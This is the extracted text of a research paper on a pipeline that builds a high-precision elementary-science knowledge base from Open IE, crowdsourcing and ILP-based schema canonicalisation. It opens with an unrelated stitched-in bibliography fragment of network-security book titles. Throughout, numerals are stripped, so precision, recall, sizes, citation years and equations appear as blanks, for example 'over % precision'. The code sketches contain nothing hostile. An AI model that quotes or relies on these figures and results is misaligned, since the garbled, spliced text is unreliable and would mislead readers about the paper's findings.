practical treasure book of network security system protection and hacker attack and defense. beijing: china railway publishing house, . author. thesis title [d]. journal of tsinghua university, , ( ): - . [ ] evi nemeth, garth snyder, trent r. hein, ben whaley. unix and linux system administration handbook ( th edition) [ ] tianhe culture. hacker attack and defense from entry to proficiency (attack and defense and script programming). beijing: machinery industry press, . [ ] cao hanming. hacker attack and defense. nanjing: southeast university press, . [ ] jiang youxu, guo quanshui, ma juan, et al. classification and community characteristics of forest communities in china [m]. beijing: science press, . [ ] songhua luo jianzhen jiang yuexia. study on the security strategy of electronic document filing in the environment of government cloud [d]. zhejiang archives, . [ ] dong zhenliang. application of cryptographic algorithms and international standardization [d]. financial information center of the people's bank of china, . [ ] zhou yinqing, ouyang zichun. brief discussion on the implementation and management of information system security level protection evaluation [d]. digital communication world, . [ ] liang lixin and li jun. information security level protection evaluation based on virtualization [d]. police technology, [ ] ma limei, wang fangwei. computer network security and experimental course, tsinghua university press,isbn: [ ] ma limei,guo qing,zhang linwei ubuntu linux operating system and experimental course, tsinghua university press,isbn: domain-targeted, high precision knowledge extraction bhavana dalvi mishra niket tandon allen institute for artificial intelligence n northlake way suite , seattle, wa {bhavanad,nikett,peterc}@allenai.org peter clark abstract our goal is to construct a domain-targeted, high precision knowledge base (kb), contain- ing general (subject,predicate,object) state- ments about the world, in support of a down- stream question-answering (qa) application. despite recent advances in information extrac- tion (ie) techniques, no suitable resource for our task already exists; existing resources are either too noisy, too named-entity centric, or too incomplete, and typically have not been constructed with a clear scope or purpose. to address these, we have created a domain- targeted, high precision knowledge extraction pipeline, leveraging open ie, crowdsourcing, and a novel canonical schema learning algo- rithm (called casi), that produces high pre- cision knowledge targeted to a particular do- main - in our case, elementary science. to measure the kb’s coverage of the target do- main’s knowledge (its “comprehensiveness” with respect to science) we measure recall with respect to an independent corpus of do- main text, and show that our pipeline produces output with over % precision and % re- call with respect to that target, a substantially higher coverage of tuple-expressible science knowledge than other comparable resources. we have made the kb publicly available . introduction while there have been substantial advances in knowledge extraction techniques, the availability of high precision, general knowledge about the world, this kb named as “aristo tuple kb” is available for down- load at http://data.allenai.org/tuple-kb remains elusive. specifically, our goal is a large, high precision body of (subject,predicate,object) statements relevant to elementary science, to sup- port a downstream qa application task. 
although there are several impressive, existing resources that can contribute to our endeavor, e.g., nell (carlson et al., ), conceptnet (speer and havasi, ), wordnet (fellbaum, ), webchild (tandon et al., ), yago (suchanek et al., ), freebase (bollacker et al., ), and reverb- m (fader et al., ), their applicability is limited by both • limited coverage of general knowledge (e.g., freebase and nell primarily contain knowl- edge about named entities; wordnet uses only a few (< ) semantic relations) • low precision (e.g., many conceptnet asser- tions express idiosyncratic rather than general knowledge) our goal in this work is to create a domain-targeted knowledge extraction pipeline that can overcome these limitations and output a high precision kb of triples relevant to our end task. our approach leverages existing techniques of open information extraction (open ie) and crowdsourcing, along with a novel schema learning algorithm. there are three main contributions of this work. first, we present a high precision extraction pipeline able to extract (subject,predicate,object) tuples rele- vant to a domain with precision in excess of %. the input to the pipeline is a corpus, a sense- disambiguated domain vocabulary, and a small set of entity types. the pipeline uses a combination of text filtering, open ie, turker annotation on sam- ples, and precision prediction to generate its output. transactions of the association for computational linguistics, vol. , pp. – , . action editor: patrick pantel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. second, we present a novel canonical schema in- duction method (called casi) that identifies clus- ters of similar-meaning predicates, and maps them to the most appropriate general predicate that cap- tures that canonical meaning. open ie, used in the early part of our pipeline, generates triples con- taining a large number of predicates (expressed as verbs or verb phrases), but equivalences and gen- eralizations among them are not captured. syn- onym dictionaries, paraphrase databases, and verb taxonomies can help identify these relationships, but only partially so because the meaning of a verb often shifts as its subject and object vary, something that these resources do not explicitly model. to address this challenge, we have devel- oped a corpus-driven method that takes into account the subject and object of the verb, and thus can learn argument-specific mapping rules, e.g., the rule “(x:animal,found in,y:location) → (x:animal,live in,y:location)” states that if some animal is found in a location then it also means the animal lives in the location. note that ‘found in’ can have very dif- ferent meaning in the schema “(x:substance,found in,y:material). the result is a kb whose general predicates are more richly populated, still with high precision. finally, we contribute the science kb itself as a resource publicly available to the research commu- nity. to measure how “complete” the kb is with re- spect to the target domain (elementary science), we use an (independent) corpus of domain text to char- acterize the target science knowledge, and measure the kb’s recall at high (> %) precision over that corpus (its “comprehensiveness” with respect to sci- ence). this measure is similar to recall at the point p= % on the pr curve, except measured against a domain-specific sample of data that reflects the dis- tribution of the target domain knowledge. 
compre- hensiveness thus gives us an approximate notion of the completeness of the kb for (tuple-expressible) facts in our target domain, something that has been lacking in earlier kb construction research. we show that our kb has comprehensiveness (recall of domain facts at > % precision) of % with respect to science, a substantially higher coverage aristo tuple kb is available for download at http:// allenai.org/data/aristo-tuple-kb of tuple-expressible science knowledge than other comparable resources. we are making the kb pub- licly available. outline we discuss the related work in section . in sec- tion , we describe the domain-targeted pipeline, in- cluding how the domain is characterized to the al- gorithm and the sequence of filters and predictors used. in section , we describe how the relation- ships between predicates in the domain are identi- fied and the more general predicates further pop- ulated. finally in section , we evaluate our ap- proach, including evaluating its comprehensiveness (high-precision coverage of science knowledge). related work there has been substantial, recent progress in knowledge bases that (primarily) encode knowledge about named entities, including freebase (bol- lacker et al., ), knowledge vault (dong et al., ), dbpedia (auer et al., ), and others that hierarchically organize nouns and named entities, e.g., yago (suchanek et al., ). while these kbs are rich in facts about named entities, they are sparse in general knowledge about common nouns (e.g., that bears have fur). kbs covering general knowledge have received less attention, although there are some notable exceptions constructed using manual methods, e.g., wordnet (fellbaum, ), crowdsourcing, e.g., conceptnet (speer and havasi, ), and, more recently, using automated meth- ods, e.g., webchild (tandon et al., ). while useful, these resources have been constructed to tar- get only a small set of relations, providing only lim- ited coverage for a domain of interest. to overcome relation sparseness, the paradigm of open ie (banko et al., ; soderland et al., ) extracts knowledge from text using an open set of relationships, and has been used to success- fully build large-scale (arg ,relation,arg ) resources such as reverb- m (containing million general triples) (fader et al., ). although broad cov- erage, however, open ie techniques typically pro- duce noisy output. our extraction pipeline can be viewed as an extension of the open ie paradigm: we start with targeted open ie output, and then ap- ply a sequence of filters to substantially improve the figure : the extraction pipeline. a vocabulary-guided sequence of open information extraction, crowdsourcing, and learning predicate relationships are used to produce high precision tuples relevant to the domain of interest. output’s precision, and learn and apply relationships between predicates. the task of finding and exploiting relationships between different predicates requires identifying both equivalence between relations (e.g., clustering to find paraphrases), and implication (hierarchical organization of relations). one class of approach is to use existing resources, e.g., verb taxonomies, as a source of verbal relationships, e.g., (grycner and weikum, ), (grycner et al., ). how- ever, the hierarchical relationship between verbs, out of context, is often unclear, and some verbs, e.g., “have”, are ambiguous. to address this, we char- acterize semantic relationships not only by a verb but also by the types of its arguments. 
a sec- ond class of approach is to induce semantic equiva- lence from data, e.g., using algorithms such as dirt (lin and pantel, ), resolver (yates and et- zioni, ), wisenet (moro and navigli, ), and amie (galárraga et al., ). these allow relational equivalences to be inferred, but are also noisy. in our pipeline, we combine these two ap- proaches together, by clustering relations using a similarity measure computed from both existing re- sources and data. a novel feature of our approach is that we not only cluster the (typed) relations, but also identify a canonical relation that all the other relations in a cluster can be mapped to, without recourse to human annotated training data or a target relational vocab- ulary (e.g., from freebase). this makes our prob- lem setting different from that of universal schema (riedel et al., ) where the clusters of relations are not explicitly represented and mapping to canon- ical relations can be achieved given an existing kb like freebase. although no existing methods can be directly applied in our problem setting, the amie- based schema clustering method of (galárraga et al., ) can be modified to do this also. we have implemented this modification (called amie*, de- scribed in section . ), and we use it as a baseline to compare our schema clustering method (casi) against. finally, interactive methods have been used to create common sense knowledge bases, for ex- ample conceptnet (speer and havasi, ; liu and singh, ) includes a substantial amount of knowledge manually contributed by people through a web-based interface, and used in numerous ap- plications (faaborg and lieberman, ; dinakar et al., ). more recently there has been work on interactive methods (dalvi et al., ; wolfe et al., ; soderland et al., ), which can be seen as a “machine teaching” approach to kb con- struction. these approaches focus on human-in-the- loop methods to create domain specific knowledge bases. such approaches are proven to be effective on domains where expert human input is available. in contrast, our goal is to create extraction tech- niques that need little human supervision, and result in comprehensive coverage of the target domain. the extraction pipeline we first describe the overall extraction pipeline. the pipeline is a chain of filters and transformations, out- putting (subject,predicate,object) triples at the end. it uses a novel combination of familiar technologies, plus a novel schema learning module, described in more detail in section . . inputs and outputs unlike many prior efforts, our goal is a domain- focused kb. to specify the kb’s extent and focus, we use two inputs: . a domain vocabulary listing the nouns and verbs relevant to the domain. in our particular application, the domain is elementary science, and the domain vocabulary is the typical vocab- ulary of a fourth grader (∼ year old child), augmented with additional science terms from th grade science texts, comprising of about nouns, verbs, adjectives, and adverbs. . a small set of types for the nouns, listing the primary types of entity relevant to the domain. in our domain, we use a manually constructed inventory of types (animal, artifact, body part, measuring instrument, etc.). in addition, the pipeline also uses: . a large, searchable text corpus to provide sen- tences for knowledge extraction. in our case, we use the web via a search engine (bing), fol- lowed by filters to extract clean sentences from search results. . 
word senses although, in general, nouns are ambiguous, in a targeted domain there is typically a clear, primary sense that can be identified. for example, while in general the word “pig” can refer to an animal, a per- son, a mold, or a block of metal, in th grade sci- ence it universally refers to an animal . we leverage this for our task by assuming one sense per noun in the domain vocabulary, and notate these senses by manually assigning each noun to one of the entity types in the type inventory. verbs are more challenging, because even within a domain they are often polysemous out of con- text (e.g., “have”). to handle this, we refer to verbs along with their argument types, the com- bination expressed as a verbal schema, e.g., (ani- mal,“have”,bodypart). this allows us to distinguish there are exceptions, e.g., in th grade science “bat” can refer to either the animal or the sporting implement, but these cases are rare. different contextual uses of a verb without introduc- ing a proliferation of verb sense symbols. others have taken a similar approach of using type restric- tions to express verb semantics (pantel et al., ; del corro et al., ). . the pipeline the pipeline is sketched in figure and exemplified in table , and consists of six steps: . . sentence selection the first step is to construct a collection of (loosely) domain-appropriate sentences from the larger corpus. there are multiple ways this could be done, but in our case we found the most effective way was as follows: a. list the core topics in the domain of inter- est (science), here producing topics derived from syllabus guides. b. for each topic, author - query templates, pa- rameterized using one or more of the do- main types. for example, for the topic “animal adapation”, a template was “[animal] adapta- tion environment”, parameterized by the type animal. the purpose of query templates is to steer the search engine to domain-relevant text. c. for each template, automatically instantiate its type(s) in all possible ways using the domain vocabulary members of those types. d. use each instantiation as a search query over the corpus, and collect sentences in the top (here, ) documents retrieved. in our case, this resulted in a generally domain- relevant corpus of m sentences. . . tuple generation second, we run an open information extraction system over the sentences to generate an initial set of (np,vp,np) tuples. in our case, we use openie . (soderland et al., ; mausam et al., ). . . headword extraction and filtering third, the np arguments are replaced with their headwords, by applying a simple headword filtering utility. we discard tuples with infrequent vps or ver- bal schemas (here vp frequency < , schema fre- quency < ). pipeline example outputs: inputs: corpus + vocabulary + types . sentence selection: “in addition, green leaves have chlorophyll.”) . tuple generation: (“green leaves” “have” “chlorophyll”) . headword extraction: (“leaf” “have” “chlorophyll”) . refinement and scoring: (“leaf” “have” “chlorophyll”) @ . (score) . phrasal tuple generation: (“leaf” “have” “chlorophyll”) @ . (score) (“green leaf” “have” “chlorophyll”) @ . (score) . relation canonicalization: (“leaf” “have” “chlorophyll”) @ . (score) (“green leaf” “have” “chlorophyll”) @ . (score) (“leaf” “contain” “chlorophyll”) @ . (score) (“green leaf” “contain” “chlorophyll”) @ . (score) table : illustrative outputs of each step of the pipeline for the term “leaf”. . . 
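a minimal sketch of this headword-and-frequency filtering step is shown below; the "last token of the noun phrase" headword heuristic, the threshold values, and the type-lookup stub are stand-ins, since the text does not name the actual utility and the concrete thresholds are elided.

```python
from collections import Counter

def headword(np_text: str) -> str:
    """Crude headword heuristic: take the last token of the noun phrase."""
    return np_text.strip().lower().split()[-1]

def filter_tuples(phrasal_tuples, min_vp_count=2, min_schema_count=2,
                  type_of=lambda noun: "thing"):
    """Reduce (NP, VP, NP) tuples to headwords, then drop tuples whose VP or
    (subject type, VP, object type) schema occurs too rarely."""
    head_tuples = [(headword(s), vp.lower(), headword(o)) for s, vp, o in phrasal_tuples]
    vp_counts = Counter(vp for _, vp, _ in head_tuples)
    schema_counts = Counter((type_of(s), vp, type_of(o)) for s, vp, o in head_tuples)
    return [t for t in head_tuples
            if vp_counts[t[1]] >= min_vp_count
            and schema_counts[(type_of(t[0]), t[1], type_of(t[2]))] >= min_schema_count]

# toy example
tuples = [("green leaves", "have", "chlorophyll"),
          ("a leaf", "have", "chlorophyll"),
          ("the cat", "chase", "a grey mouse")]
print(filter_tuples(tuples))  # the rare "chase" tuple is dropped
```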
refinement and scoring fourth, to improve precision, turkers are asked to manually score a proportion (in our case, %) of the tuples, then a model is constructed from this data to score the remainder. for the turk task, turkers were asked to label each tuple as true or false/nonsense. each tuple is labeled times, and a majority vote is applied to yield the overall label. the semantics we apply to tuples (and which we ex- plain to turkers) is one of plausibility: if the fact is true for some of the arg ’s, then score it as true. for example, if it is true that some birds lay eggs, then the tuple (bird, lay, egg) should be marked true. the degree of manual vs. automated can be selected here depending on the precision/cost constraints of the end application. we then build a model using this data to predict scores on other tuples. for this model, we use lo- gistic regression applied to a set of tuple features. these tuple features include normalized count fea- tures, schema and type level features, pmi statis- tics and semantic features. normalized count fea- tures are based on the number of occurrences of tu- ples, and the number of unique sentences the tuple is extracted from. schema and type level features are derived from the subject and object type, and frequency of schema in the corpus. semantic fea- tures are based on whether subject and object are ab- stract vs. concrete (using turney et al’s abstractness database (turney et al., )), and whether there are any modal verbs (e.g. may, should etc.) in the original sentence. pmi features are derived from the count statistics of subject, predicate, object and en- tire triple in the google n-gram corpus (brants and franz, ). . . phrasal tuple generation fifth, for each headword tuple (n,vp,n), retrieve the original phrasal triples (np,vp,np) it was de- rived from, and add sub-phrase versions of these phrasal tuples to the kb. for example, if a headword tuple (cat, chase, mouse) was derived from (a black furry cat, chased, a grey mouse) then the algorithm considers adding (black cat, chase, mouse) (black furry cat, chase, mouse) (black cat, chase, grey mouse) (black furry cat, chase, grey mouse) valid noun phrases are those following a pattern “<adj>* <noun>+”. the system only retains constructed phrasal tuples for which both subject and object phrases satisfy pmi and count thresh- olds , computed using the google n-gram corpus (brants and franz, ). in general, if the head- word tuple is scored as correct and the pmi and count thresholds are met, then the phrasal originals and variants are also correct. (we evaluate this in section . ). . . canonical schema induction finally, we induce a set of schema mapping rules over the tuples that identify clusters of equivalent and similar relations, and map them to a canonical, generalized relation. these canonical, generalized relations are referred to as canonical schemas, and the induction algorithm is called casi (canonical schema induction). the rules are then applied to the tuples, resulting in additional general tuples be- ing added to the kb. the importance of this step is that generalizations among seemingly disparate tu- ples are made explicit. while we could then discard e.g., “black bear” is a usable phrase provided it occurs > k times in the n-gram corpus and log[p(“black bear”)/p(“black”).p(“bear”)] > k in the n-gram corpus, where constants k and k were chosen to optimize performance on a small test set. 
tuples that are mapped to a generalized form, we instead retain them in case a query is made to the kb that requires the original fine-grained distinctions. in the next section, we describe how these schema mapping rules are learned.
canonical schema induction (casi)
. task: induce schema mapping rules
the role of the schema mapping rules is to make generalizations among seemingly disparate tuples explicit in the kb. to do this, the system identifies clusters of relations with similar meaning, and maps them to a canonical, generalized relation. the mappings are expressed using a set of schema mapping rules, and the rules can be applied to infer additional, general triples in the kb. informally, mapping rules should combine evidence from both external resources (e.g., verb taxonomies) and data (tuples in the kb). this observation allows us to formally define an objective function to guide the search for mapping rules. we define: • a schema is a structure (type ,verb phrase,type ), where the types are from the input type inventory. • a schema mapping rule is a rule of the form schemai → schemaj, stating that a triple using schemai can be re-expressed using schemaj. • a canonical schema is a schema that does not occur on the left-hand side of any mapping rule, i.e., it does not point to any other schema. to learn a set of schema mapping rules, we select from the space of possible mapping rules so as to: • maximize the quality of the selected mapping rules, i.e., maximize the evidence that the selected rules express valid paraphrases or generalizations. that is, we are looking for synonymous and type-of edges between schemas. this evidence is drawn from both existing resources (e.g., wordnet) and statistical evidence (among the tuples themselves). • satisfy the constraint that every schema points to a canonical schema, or is itself a canonical schema. we can view this task as a subgraph selection problem in which the nodes are schemas, and directed edges are possible mapping rules between schemas. the learning task is to select subgraphs such that all nodes in a subgraph are similar, and point to a single, canonical node (figure ). we refer to the blue nodes in figure as induced canonical schemas. to solve this selection problem, we formulate it as a linear optimization task and solve it using integer linear programming (ilp), as we now describe.
[figure : learning schema mapping rules can be viewed as a subgraph selection problem, whose result (illustrated) is a set of clusters of similar schemas, all pointing to a single, canonical form.]
. features for learning schema mapping rules
to assess the quality of candidate mapping rules, we combine features from the following sources: moby, wordnet, association rules, and statistical features from our corpus. these features indicate synonymy or type-of links between schemas. for each schema si, e.g., (animal, live in, location), we define the relation ri as the verb phrase (e.g., "live in"), and vi as the root verb of ri (e.g., "live"). • moby: we also use verb phrase similarity scores derived from the moby thesaurus. the moby score mij for a schema pair is computed by a lookup in this dataset for the relation pair ri, rj or the root verb pair vi, vj. this is an undirected feature, i.e., mij = mji. • wordnet: if there exists a troponym link path from schema ri to rj, then we define the wordnet score wij for this schema pair as the inverse of the number of edges that need to be traveled to reach rj from ri. if such a path does not exist, then we look for a path from vi to vj. since we do not know the exact wordnet synset applicable for each schema, we consider all possible synset choices and pick the best score as wij. this is a directed feature, i.e., wij ≠ wji. note that even though wordnet is a high quality resource, it is not completely sufficient for our purposes. out of the unique relations (verb phrases) in our kb, only ( %) are present in wordnet. we can deal with these out-of-wordnet verb phrases by relying on the other sets of features described next. • amie: amie is an association rule mining system that can produce association rules of the form "?a eat ?b → ?a consume ?b". we have two sets of amie features: typed and untyped. untyped features are of the form ri → rj, e.g., eat → consume, whereas typed features are of the form si → sj, e.g., (animal,eat,food) → (animal,consume,food). amie produces real-valued scores between 0 and 1 for each rule; we define auij and atij as the untyped and typed amie rule scores respectively, and we use the pca confidence scores produced by amie. • specificity: we define the specificity of each relation as its idf score in terms of the number of argument pairs it occurs with, compared to the total number of argument type pairs in the corpus. the specificity score of a schema mapping rule favors more general predicates on the parent side of the rule: specificity(r) = idf(r), sp(r) = specificity(r) / max_r′ specificity(r′), and sij = sp(ri) − sp(rj). further, we have a small set of very generic relations like "have" and "be" that are treated as relation stopwords by setting their sp(r) scores to .
these features encode different aspects of similarity between schemas, as summarized in table .
[table : the different features used in relation canonicalization capture different aspects of similarity. columns: feature type (semantic vs. distributional), which parts of the schema are used (subject, predicate, object), and what kind of relations are encoded (synonym, type-of, temporal implication); rows: moby, wordnet, amie-typed, amie-untyped.]
in this work we combine semantic, high-quality features from wordnet and the moby thesaurus with weak distributional similarity features from amie to generate schema mapping rules. we have observed that thesaurus features are very effective for predicates which are less ambiguous, e.g., eat, consume, live in. association rule features, on the other hand, provide evidence for predicates which are very ambiguous, e.g., have, be. thus these features are complementary. further, these features indicate different kinds of relations between two schemas: synonymy, type-of, and temporal implication (refer to table ). in this work, we want to learn the schema mapping rules that capture synonymy and type-of relations and discard the temporal implications. this makes our problem setting different from that of knowledge base completion methods, e.g., (socher et al., ). our proposed method casi uses an ensemble of semantic and statistical features, enabling us to promote the synonymy and type-of edges and to select the most general schema as the canonical schema per cluster.
figure : the ilp used for canonical schema induction.
maximize over {xij}: ∑i,j xij (λ1·mij + λ2·wij + λ3·atij + λ4·auij + λ5·sij) − δ·‖x‖1   ( )
subject to:
xij ∈ {0, 1} ∀〈i,j〉 (the xij are boolean);
xij + xji ≤ 1 ∀i,j (the schema mapping relation is asymmetric);
∑j xij ≤ 1 ∀i (select at most one parent per schema);
xij + xjk − xik ≤ 1 ∀〈i,j,k〉 (the schema mapping relation is transitive).
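the selection problem in the figure above can be prototyped with an off-the-shelf solver. the sketch below uses the python pulp package as an assumed stand-in for the scpsolver engine mentioned in the next subsection, with made-up schemas and combined scores (the λ-weighted feature combination is collapsed into a single score per candidate rule); it encodes the boolean, asymmetry, single-parent, and transitivity constraints.

```python
import pulp

# candidate schemas (verb phrases for one argument-type pair) and made-up
# combined scores for each candidate mapping rule i -> j
schemas = ["live_in", "inhabit", "reside_in", "found_in"]
score = {(i, j): 0.0 for i in schemas for j in schemas if i != j}
score[("inhabit", "live_in")] = 0.9
score[("reside_in", "live_in")] = 0.8
score[("found_in", "live_in")] = 0.4
delta = 0.2  # sparsity penalty on the number of selected rules

prob = pulp.LpProblem("casi_sketch", pulp.LpMaximize)
x = {e: pulp.LpVariable(f"x_{e[0]}_to_{e[1]}", cat="Binary") for e in score}

# objective: sum of x_ij * score_ij minus delta * ||x||_1
prob += pulp.lpSum((score[e] - delta) * x[e] for e in score)

for i in schemas:
    # select at most one parent (canonical target) per schema
    prob += pulp.lpSum(x[(i, j)] for j in schemas if j != i) <= 1
    for j in schemas:
        if j == i:
            continue
        prob += x[(i, j)] + x[(j, i)] <= 1  # asymmetry
        for k in schemas:
            if k != i and k != j:
                prob += x[(i, j)] + x[(j, k)] - x[(i, k)] <= 1  # transitivity

prob.solve(pulp.PULP_CBC_CMD(msg=False))
print("selected mapping rules:", [e for e in score if x[e].value() > 0.5])
```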
ilp model used in casi the features described in section . provide par- tial support for possible schema mapping rules in our dataset. the final set of rules we select needs to comply with asymmetry, transitive closure and at most one parent per schema constraints. we use an integer linear program to find the optimal set of schema mapping rules that satisfy these constraints, shown formally in figure . we decompose the schema mapping problem into multiple independent sub-problems by considering schemas related to a pair of argument types, e.g, all schemas that have domain or range types an- imal, location would be considered as a separate sub-problem. this way we can scale our method to large sets of schemas. the ilp for each sub-problem is presented in equation . in equation , each xij is a boolean variable representing whether we pick the schema mapping rule si → sj. as described in section . , mij,wij,atij,auij,sij represent the scores pro- duced by moby, wordnet, amie-typed, amie- untyped and specificity features respectively for the schema mapping rule si → sj. the objective func- tion maximizes the weighted combination of these scores. further, the solution picked by this ilp sat- isfies constraints such as asymmetry, transitive clo- sure and at most one parent per schema. we also apply an l sparsity penalty on x, retaining only those schema mapping edges for which the model is reasonably confident. for n schemas, there are o(n ) transitivity con- straints which make the ilp very inefficient. berant et al. ( ) proposed two approximations to handle a large number of transitivity rules by decomposing the ilp or solving it in an incremental way. instead we re-write the ilp rules in such a way that we can efficiently solve our mapping problem without intro- ducing any approximations. the last two constraints of this ilp can be rewritten as follows: (∑ j xij ≤ ,∀i and xij + xjk −xik ≤ , ∀〈i,j,k〉 ) =⇒ if(xij = ) then xjk = ∀k this results in o(n ) constraints and makes the ilp efficient. impact of this technique in terms of run- time is described in section . . we then use an off-the-shelf ilp optimization en- gine called scpsolver (planatscher and schober, ) to solve the ilp problems. the output of our ilp model is the schema mapping rules. we then apply these rules onto kb tuples to generate addi- tional, general tuples. some examples of the learned rules are: (organism, have, phenomenon) → (organism, undergo, phenomenon) (animal, have, event) → (animal, experience, event) (bird, occupy, location) → (bird, inhabit, location) evaluation . kb comprehensiveness our overall goal is a high-precision kb that has rea- sonably “comprehensive” coverage of facts in the target domain, on the grounds that these are the facts that a domain application is likely to query about. this notion of kb comprehensiveness is an impor- tant but under-discussed aspect of knowledge bases. for example, in the automatic kb construction lit- erature, while a kb’s size is often reported, this does not reveal whether the kb is near-complete or merely a drop in the ocean of that required (razniewski et al., ; stanovsky and dagan, ). more formally, we define comprehensive- ness as: recall at high (> %) precision of domain- relevant facts. this measure is similar to recall at the point p= % on the pr curve, except recall is mea- sured with respect to a different distribution of facts (namely facts about elementary science) rather than a held-out sample of data used to build the kb. 
the particular target precision value is not critical; what is important is that the same precision point is used when comparing results. we choose % as subjectively reasonable; at least out of queries to the kb should be answered correctly.
[table : precision and coverage of tuple-expressible elementary science knowledge by existing resources vs. our kb; rows: webchild, nell, conceptnet, reverb- m, our kb; columns: kb precision, coverage of tuple-expressible science knowledge (science recall @ % precision), and kb comprehensiveness w.r.t. the science domain (recall on the science kb); precision estimates are within +/- % with a % confidence interval.]
there are several ways this target distribution of required facts can be modeled. to fully realize the ambition of this metric, we would directly identify a sample of required end-task facts, e.g., by manual analysis of questions posed to the end-task system, or from logs of the interaction between the end-task system and the kb. however, given the practical challenges of doing this at scale, we take a simpler approach and approximate this end-task distribution using facts extracted from an (independent) domain-specific text corpus (we call this a reference corpus). note that these facts are only a sample of domain-relevant facts, not the entirety. otherwise, we could simply run our extractor over the reference corpus and have all we need. now we are in a strong position, because the reference corpus gives us a fixed point of reference to measure comprehensiveness: we can sample facts from it and measure what fraction the kb “knows”, i.e., can answer as true (figure ).
[figure : comprehensiveness (frequency-weighted coverage c of the required facts d) can be estimated using coverage a of a reference kb b as a surrogate sampling of the target distribution.]
for our specific task of elementary science qa, we have assembled a reference corpus of ∼ . m sentences comprising multiple elementary science textbooks, multiple dictionary definitions of all fourth grade vocabulary words, and simple wikipedia pages for all fourth grade vocabulary words (where such pages exist). to measure our kb’s comprehensiveness (of facts within the expressive power of our kb), we randomly sampled facts, expressed as headword tuples, from the reference corpus (this corpus, named the “aristo mini corpus”, is available for download at http://allenai.org/data/aristo-tuple-kb). these were generated semi-automatically using parts of our pipeline, namely information extraction then turker scoring to obtain true facts; we call these facts the reference kb. (this method will of course miss many facts in the reference corpus, e.g., when extraction fails or when the fact is in a non-sentential form, e.g., a table. however, we only assume that the distribution of extracted facts is representative of the domain.) to the extent our tuple kb contains facts in this reference kb (and under the simplifying assumption that these facts are representative of the science knowledge our qa application needs), we say our tuple kb is comprehensive. doing this yields a value of % comprehensiveness for our kb (table ). we also measured the precision and science coverage of other, existing fact kbs. for precision, we took a random sample of facts in each kb, and followed the same methodology as earlier so that the
these test facts are published with the dataset at http://allenai.org/data/aristo-tuple-kb comparison is valid: turkers label each fact as true or false/nonsense, each fact is labeled times, and the majority label is the overall label. the preci- sions are shown in table . for conceptnet, we used only the subset of facts with frequency > , as frequency= facts are particularly noisy (thus the precision of the full conceptnet would be lower). we also computed the science coverage (= com- prehensiveness, if p> %) using our reference kb. note that these other kbs were not designed with elementary science in mind and so, not surprisingly, they do not cover many of the relations in our do- main. to make the comparison as fair as possible, given these other kbs use different relational vocab- ularies, we first constructed a list of very general relations (similar to the conceptnet relations, e.g., causes, uses, part-of, requires), and then mapped re- lations used in both our reference facts, and in the other kbs, to these relations. to compare if a reference fact is in one of these other kbs, only the general relations need to match, and only the subject and object headwords need to match. this allows substantial linguistic variation to be permitted dur- ing evaluation (e.g., “contain”,. “comprise”, “part of” etc. would all be considered matching). in other words, this is a generous notion of “a kb containing a fact”, in order to be as fair as possible. as table illustrates, these other kbs cover very little of the target science knowledge. in the case of webchild and nell, the primary reason for low recall is low overlap between their target and ours. nell has almost no predicate overlap with our ref- erence kb, reflecting it’s named entity centric con- tent. webchild is rich in part-of and location in- formation, and covers % of part-of and location facts in our reference kb. however, these are only . % of all the facts in the reference kb, resulting in an overall recall (and comprehensiveness) of %. in contrast, conceptnet and reverb- m have sub- stantially more relational overlap with our reference kb, hence their recall numbers are higher. however, both have lower precision, limiting their utility. this evaluation demonstrates the limited science coverage of existing resources, and the degree to which we have overcome this limitation. the extrac- tion methods used to build these resources are not directly comparable since they are starting with dif- ferent input/output settings and involve significantly different degrees of supervision. rather, the results suggest that general-purpose kbs (e.g., nell) may have limited coverage for specific domains, and that our domain-targeted extraction pipeline can signifi- cantly alleviate this in terms of precision and cover- age when that domain is known. extraction stage #schemas #tuples % avg. output precision . tuple generation - . m . . headword tuples . k k . . tuple scoring . k k . . phrasal tuples . k k . . canonical schemas . k k . table : evaluation of kb at different stages of extrac- tion. precision estimates are within +/- % with % con- fidence interval. . performance of the extraction pipeline in addition, we measured the average precision of facts present in the kb after every stage of the pipeline (table ). we can see that the pipeline take as input . m openie tuples with precision of % and produces a good quality science kb of over k facts with . % precision organized into k schemas. 
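as an illustration of how the comprehensiveness and science-coverage numbers can be estimated, the sketch below is a hypothetical helper, not the authors' evaluation code; the relation_map table, the headword matching and the toy facts are invented stand-ins for the generous matching described in the text.

def comprehensiveness(reference_facts, kb_facts, relation_map):
    # facts are (subject headword, relation, object headword) triples; relations
    # on both sides are mapped to a small set of general relations so that
    # variants such as "contain" / "comprise" / "part of" can match
    def general(fact):
        s, r, o = fact
        return (s.lower(), relation_map.get(r.lower(), r.lower()), o.lower())
    kb_index = {general(f) for f in kb_facts}
    hits = sum(1 for f in reference_facts if general(f) in kb_index)
    return hits / len(reference_facts)

relation_map = {"comprise": "part-of", "contain": "part-of", "part of": "part-of"}
reference_sample = [("leaf", "part of", "plant"), ("bear", "eat", "fish")]
kb = [("leaf", "comprise", "plant")]
print(comprehensiveness(reference_sample, kb, relation_map))   # 0.5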
the table also shows that precision is largely preserved as we introduce phrasal triples and general tuples. . evaluation of canonical schema induction in this section we will focus on usefulness and cor- rectness of our canonical schema induction method. the parameters of the ilp model (see equation ) i.e., λ . . .λ and δ are tuned based on sample accu- racy of individual feature sources and using a small schema mapping problem with schemas applicable to vocabulary types animal and body-part. λ = . , λ = . , λ = . , λ = . , λ = . , δ = . further, with o(n ) transitivity constraints we could not successfully solve a single ilp problem with schemas within a time limit of hour. whereas, when we rewrite them with o(n ) con- straints as explained in section . , we could solve ilp sub-problems within minutes with aver- age runtime per ilp being msec. canonical schema induction method comprehensiveness none . % amie* . % casi (our method) . % table : use of the casi-induced schemas significantly (at the % confidence level) improves comprehensive- ness of the kb. as discussed in section , we not only cluster the (typed) relations, but also identify a canoni- cal relation that all the other relations in a cluster can be mapped to, without recourse to human an- notated training data or a target relational vocab- ulary. although no existing methods do this di- rectly, the amie-based schema clustering method of (galárraga et al., ) can be extended to do this by incorporating the association rules learned by amie (both typed and untyped) inside our ilp framework to output schema mapping rules. we call this exten- sion amie*, and use it as a baseline to compare the performance of casi against. . . canonical schema usefulness the purpose of canonicalization is to allow equiv- alence between seemingly different schema to be recognized. for example, the kb query (“polar bear”, “reside in”, “tundra”)? can be answered by a kb triple (“polar bear”, “inhabit”, “tundra”) if schema mapping rules map one or both to the same canonical form e.g., (“polar bear”, “live in”, “tun- dra”) using the rules: (animal, inhabit, location) → (animal, live in, location) (animal, reside in, location) → (animal, live in, location) one way to quantitatively evaluate this is to mea- sure the impact of schema mapping on the com- prehensiveness 